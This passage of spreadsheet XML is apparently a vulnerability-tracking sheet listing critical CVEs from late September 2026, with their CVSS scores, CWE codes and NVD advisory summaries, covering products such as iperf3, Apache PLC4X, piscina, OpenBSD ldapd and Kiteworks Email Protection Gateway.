      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96822</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in Books Gallery &lt;= 4.8.3 versions.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96822</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101276</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>iperf3 3.21 (esnet/iperf) contains a remote, unauthenticated heap use-after-free: the server's per-test watchdog server_timer_proc() frees streams without cancelling/joining their worker threads, so a blocked worker dereferences a freed iperf_stream; fixed in 3.22.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101276</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101283</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>98a01053-8a31-4f6d-9aa9-252be161adc6</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>iperf3 3.20–3.21 (esnet/iperf) has a pre-auth heap buffer overflow in decrypt_rsa_message(): a 256-byte RSA buffer is BIO_read with the attacker-controlled ciphertext length (guard warns only), so an unauthenticated client overflows the heap via an oversized authtoken; fixed in 3.22</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101283</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102508</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-347, CWE-757</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Cryptographic Signature and Improper Certificate Validation in the OPC UA driver of Apache PLC4X (PLC4J) allows an attacker in a network position between client and server to impersonate the OPC UA server and to read, forge or modify secure-channel traffic, including user credential ssent by the client.
The defect manifests differently depending on the version:
- In 0.9.0 through 0.11.0 a failed message-signature check is only logged and never enforced, and there is no mechanism to verify the server certificate: it is taken from the unauthenticated GetEndpoints discovery response and used to encrypt the user's password.
- In 0.12.0 through 0.13.1 the signature check is inverted (valid signatures are rejected, invalid ones accepted), and server certificates are accepted without a trust anchor by default.
- In all affected versions the default security policy is None. Starting with 0.12.0 the driver additionally continues silently at a weaker security policy than the one configured, and starting with 0.13.0 endpoint selection prefers the weakest matching endpoint.
Users checking only for one of these mechanisms may wrongly conclude they are unaffected.
This issue affects Apache PLC4X: from 0.9.0 before 1.0.0.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 verifies message signatures correctly, refuses to connect unless the server certificate can be verified against a configured trust store or pinned certificate, defaults to Basic256Sha256 with SignAndEncrypt, and fails the
connection if the negotiated security policy is weaker than the configured one.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102508</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102992</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>piscina is a node.js worker pool implementation. Prior to 4.9.4, 5.3.2, and 6.0.0-rc.5, Piscina stores ThreadPool.options in src/index.ts as a plain object that inherits from Object.prototype. Applications with a separate prototype-pollution primitive can therefore supply inherited values for security-sensitive options that do not have own defaults. An inherited execArgv value is passed to the Node.js Worker constructor and can preload attacker-controlled code in worker threads, an inherited loadBalancer function can execute during task scheduling, and inherited env values can alter worker environments. This issue is fixed in versions 4.9.4, 5.3.2, and 6.0.0-rc.5.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102992</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103547</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>In ldapd in OpenBSD 7.8 before errata 057 and 7.9 before errata 021, delegated BSD authentication results are correlated only by the LDAP child process client file descriptor and LDAP message ID. After a connection closes, a later connection that reuses the same file descriptor and message ID can receive the earlier authentication result. A remote attacker who can reach ldapd can complete a Bind as another identity. A missing connection can also cause a NULL pointer dereference. (ldapd is not enabled by default.)</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103547</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19445</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>A remote, unauthenticated TLS client can make a server crash or call
through a freed pointer if its sni_callback assigns a different context to
SSLSocket.context (the documented way to select a certificate per server
name) and nothing else keeps the original ssl.SSLContext alive. Typical
cases are servers that create an SSLContext per connection or replace it
while connections are open; servers that wrap their listening socket with
it are not affected.
Mitigation: keep a reference to every SSLContext that sets sni_callback for
the lifetime of the server. TLS clients are not affected.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19445</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74865</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>sogo_yhn configures SOGo with a parameter "SOGoTrustProxyAuthentication=YES". This causes the password to be bypassed during HTTP Basic authentication. An unauthenticated attacker who provides the username of an existing user and any arbitrary password can successfully log in to that user's account.
This issue was fixed in version 5.8.0~ynh9.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74865</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102095</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Email Protection Gateway before version 9.5.0 is vulnerable to Server-Side Request Forgery. Kiteworks Email Protection Gateway performed server-side fetches of URLs contained in the message content it processed, without adequately restricting the fetch destination. A remote, unauthenticated sender could craft a message that caused the gateway to issue requests to internal services and cloud instance metadata endpoints and return the responses, potentially disclosing sensitive internal data and, depending on the internal service reached, affecting its state.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102095</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102102</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S43"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an issuer certificate in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102102</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102103</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S44"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 certificate revocation list in an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102103</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102104</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S45"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performs an online certificate status check for an inbound message. Depending on the services reachable from the gateway, this could disclose sensitive internal information or disrupt gateway operation.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102104</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102105</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S46"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renders message content that references external resources. Depending on the services reachable from the gateway, this could disclose sensitive internal information or trigger unintended actions on internal systems.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102105</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102106</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in a Kiteworks Email Protection Gateway administrative service. An administrative service in Kiteworks Email Protection Gateway did not consistently enforce administrator authentication, so the required password check could be bypassed. An attacker who referenced a valid administrator account could potentially create, modify, or delete internal users and managed domains and change their security-feature configuration without authenticating; deleting a managed domain also removes its user accounts and could lock administrators out of the gateway.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102106</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62308</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>docker, requests</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.6, Tugtainer allows an authenticated user to make the backend server send outbound HTTP requests to arbitrary user-supplied URLs through the notification test endpoint. The /settings/test_notification endpoint accepts a urls field and passes it directly to Apprise without restricting protocols, hostnames, localhost addresses, private IP ranges, or cloud metadata addresses. This can be abused as an authenticated blind server-side request forgery (SSRF). This issue has been patched in version 1.30.6.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62308</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75969</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>16cac6a8-cc1e-4741-89aa-6b97e2437706</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
